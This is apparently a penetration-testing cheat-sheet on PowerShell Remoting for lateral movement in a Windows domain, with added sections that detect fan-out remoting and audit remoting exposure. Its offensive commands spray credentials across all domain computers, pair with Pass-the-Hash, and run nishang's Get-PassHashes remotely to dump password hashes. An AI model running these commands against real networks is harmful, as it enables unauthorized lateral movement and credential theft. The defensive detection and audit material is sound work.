# PowerShell Remoting

Instead of having to connect to a workstation from outside the network every time we want to execute commands, if we are already in a PowerShell session we can either start a new session on the target box or issue commands on the target remotely from the session we are already in.

Executing commands this way is, of course, less noisy. You can run scripts or locally defined functions from your current workstation against the target remotely, and, given the privileges, you can issue a single command to multiple targets in the network at once (fan-out remoting).

You may have to enable remoting (Enable-PSRemoting) on your workstation if PSRemoting is not already enabled; this requires Administrator privileges.

This works excellently in conjunction with Pass-the-Hash.

Some of these commands will require PowerView.

### Storing Credentials into the Session

* Method 1: Using the Get-Credential cmdlet (it prompts for the password, by default with a dialog, so it needs an interactive desktop such as an RDP session):

```powershell
$cred = Get-Credential <user>  # enter the password in the prompt
```

* Method 2: Using the New-Object cmdlet (no prompt, so it works from a non-interactive shell):

```powershell
$user = '<user>'
$pwd = '<password>'
$secure_pwd = $pwd | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $secure_pwd
```
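Method 2 leaves the plaintext password in the command history and in any transcript or script block log. As an added example, not from the original notes, this is the same PSCredential persisted with Export-Clixml, which protects the SecureString with DPAPI for the current user on the current machine; the file path and the `<user>` placeholder are assumptions:

```powershell
# Added example (not from the original notes): keep the password out of the
# command history and transcripts by serialising the PSCredential once.
# Export-Clixml wraps the SecureString with DPAPI scoped to this user and
# this machine, so the file is useless if copied elsewhere. Path is ours.
$credPath = Join-Path $env:LOCALAPPDATA 'remoting-cred.xml'

# First run: prompt once and persist the credential (the password is never typed in clear).
if (-not (Test-Path $credPath)) {
    Get-Credential -UserName '<user>' -Message 'Credential for PSRemoting' |
        Export-Clixml -Path $credPath
}

# Later runs: rehydrate without prompting and without a plaintext password anywhere.
$cred = Import-Clixml -Path $credPath

# Sanity check before handing it to New-PSSession / Invoke-Command.
if ($cred -isnot [System.Management.Automation.PSCredential]) {
    throw "Unexpected object in $credPath; expected a PSCredential"
}
"Loaded credential for $($cred.UserName)"
```

Caveat: the DPAPI protection applies on Windows only; PowerShell 7 on Linux or macOS writes the SecureString out unprotected, so do not use this pattern there.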

### Begin a New Session on Another Workstation

```powershell
Enter-PSSession -ComputerName <computer>
```

### Running a Stateful Session and Then Entering It

```powershell
$sess = New-PSSession -ComputerName <computer> [-Credential $cred]  # persists until Remove-PSSession
Enter-PSSession -Session $sess
```

### Executing Commands Remotely on Another Workstation

```powershell
Invoke-Command -ComputerName <computer> -ScriptBlock {<command>}
Invoke-Command -Session $sess -ScriptBlock {<command>}
```

### Spraying Computers to See Where You Have Access

```powershell
Invoke-Command -ScriptBlock {hostname;whoami} -Credential $cred -ComputerName (Get-NetComputer)
```

* My little script is a bit cleaner:

```powershell
foreach ($comp in Get-NetComputer) {
    # whoami on each host; errors (no access, host down) are discarded so the output stays readable.
    # Add -Credential $cred if the current session is not running as the target user.
    $comp + ' : ' + (Invoke-Command -ScriptBlock {whoami} -ComputerName $comp 2>$null)
}
```
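From the target side, every incoming remote session is recorded as Event ID 91 ("Creating WSMan shell on server") in the Microsoft-Windows-WinRM/Operational log of the machine being connected to, so a spray like the one above shows up as one account appearing in that event across many hosts within a short window. The function below is an added example, not part of the original notes; it assumes the WinRM logs are collected centrally (for instance via Windows Event Forwarding), and the threshold, window and sample events are constructed here:

```powershell
# Added example (not from the original notes): spot fan-out remoting in
# centrally collected WinRM/Operational events. Event 91 is logged on the
# target, so one UserId opening shells on many MachineNames in a short
# window is the server-side footprint of a spray. Threshold and window
# are our assumptions; tune them to the environment.
function Find-FanOutRemoting {
    param(
        [Parameter(Mandatory)] [object[]]$Events,           # objects with Id, UserId, MachineName, TimeCreated
        [int]$HostThreshold = 3,
        [timespan]$Window = [timespan]::FromMinutes(10)
    )
    $Events |
        Where-Object { $_.Id -eq 91 -and $_.UserId } |
        Group-Object { $_.UserId.ToString() } |
        ForEach-Object {
            $sorted = @($_.Group | Sort-Object TimeCreated)
            $hosts  = @($sorted.MachineName | Select-Object -Unique)
            $span   = $sorted[-1].TimeCreated - $sorted[0].TimeCreated
            [pscustomobject]@{
                User       = $_.Name
                Hosts      = $hosts.Count
                Span       = $span
                Suspicious = ($hosts.Count -ge $HostThreshold -and $span -le $Window)
            }
        }
}

# Live use on a collector (commented out so the constructed sample below runs anywhere):
# $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91 }
# Find-FanOutRemoting -Events $events | Where-Object Suspicious

# Constructed sample: one account opening shells on four hosts within
# about a minute (the spray pattern) and an admin connecting to one host.
$t0 = Get-Date '2024-01-01 09:00:00'
$sample = @(
    @{ Id = 91; UserId = 'S-1-5-21-1-1-1-1105'; MachineName = 'WS01';  TimeCreated = $t0 }
    @{ Id = 91; UserId = 'S-1-5-21-1-1-1-1105'; MachineName = 'WS02';  TimeCreated = $t0.AddSeconds(20) }
    @{ Id = 91; UserId = 'S-1-5-21-1-1-1-1105'; MachineName = 'WS03';  TimeCreated = $t0.AddSeconds(45) }
    @{ Id = 91; UserId = 'S-1-5-21-1-1-1-1105'; MachineName = 'SRV01'; TimeCreated = $t0.AddSeconds(70) }
    @{ Id = 91; UserId = 'S-1-5-21-1-1-1-500';  MachineName = 'SRV02'; TimeCreated = $t0.AddHours(1) }
    @{ Id = 6;  UserId = 'S-1-5-21-1-1-1-500';  MachineName = 'SRV02'; TimeCreated = $t0.AddHours(1) }  # client-side event, ignored
) | ForEach-Object { [pscustomobject]$_ }

Find-FanOutRemoting -Events $sample | Format-Table -AutoSize
```

On the sample, the 1105 account is reported with four hosts and `Suspicious = True`, the 500 account with one host and `False`. Real events carry UserId as a SecurityIdentifier; `$_.UserId.Translate([System.Security.Principal.NTAccount])` resolves it to a name when the report is for humans.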

### Executing Scripts Remotely

```powershell
Invoke-Command -FilePath <C:\path\to\script> -ComputerName <computer> [-Credential $cred]
```

* You can spray this command onto other workstations at once as well...

```powershell
Invoke-Command -FilePath <C:\path\to\script> -ComputerName (Get-NetComputer)
```

### Execute Locally Loaded Functions on Remote Machines

```powershell
# Using Get-PassHashes.ps1 from nishang as an example
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-NetComputer) [-ArgumentList <args>] [-Credential $cred] 2>$null
```
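Two things decide whether the fan-out above works against a given host and whether it leaves a record: which principals the default endpoint admits, and whether script block logging is on so the remote script block body lands in Event ID 4104 on the target. The audit below is an added example, not part of the original notes; it uses only built-in cmdlets and must run elevated, since Get-PSSessionConfiguration needs administrator rights:

```powershell
# Added example (not from the original notes): audit one host's remoting
# exposure. Run elevated. The registry path is the standard policy location
# for script block logging; everything else comes from built-in cmdlets.
function Get-RemotingExposure {
    $cfg = Get-PSSessionConfiguration -Name 'Microsoft.PowerShell' -ErrorAction SilentlyContinue

    # Active WinRM listeners (transport, port, bound address).
    $listeners = Get-WSManInstance -ResourceURI winrm/config/listener -Enumerate -ErrorAction SilentlyContinue |
        ForEach-Object { '{0}:{1} on {2}' -f $_.Transport, $_.Port, $_.Address }

    # Every member of these two local groups can open a session through the
    # default endpoint; nested domain groups are where the surprises hide.
    $allowed = foreach ($g in 'Administrators', 'Remote Management Users') {
        Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue |
            ForEach-Object { '{0} (via {1})' -f $_.Name, $g }
    }

    # Script block logging policy: with it off, a remote ${function:...} call
    # executes on this host without its body ever reaching Event ID 4104.
    $sbl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue

    [pscustomobject]@{
        Endpoint            = $cfg.Name
        EndpointPermissions = $cfg.Permission
        Listeners           = $listeners
        AllowedPrincipals   = $allowed
        ScriptBlockLogging  = [bool]$sbl.EnableScriptBlockLogging
    }
}

$exposure = Get-RemotingExposure
$exposure | Format-List

if (-not $exposure.ScriptBlockLogging) {
    Write-Warning 'Script block logging is off: remote script blocks will not appear in Event ID 4104 on this host.'
}
```

The two findings that usually matter are a non-administrator principal in Remote Management Users that nobody remembers adding, and `ScriptBlockLogging = False` on a host that accepts remote sessions.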

### Copying Files Remotely

```powershell
Copy-Item -ToSession $sess -Path C:\local\path\to\file -Destination C:\destination\path  # -ToSession/-FromSession need PowerShell 5.0+
```
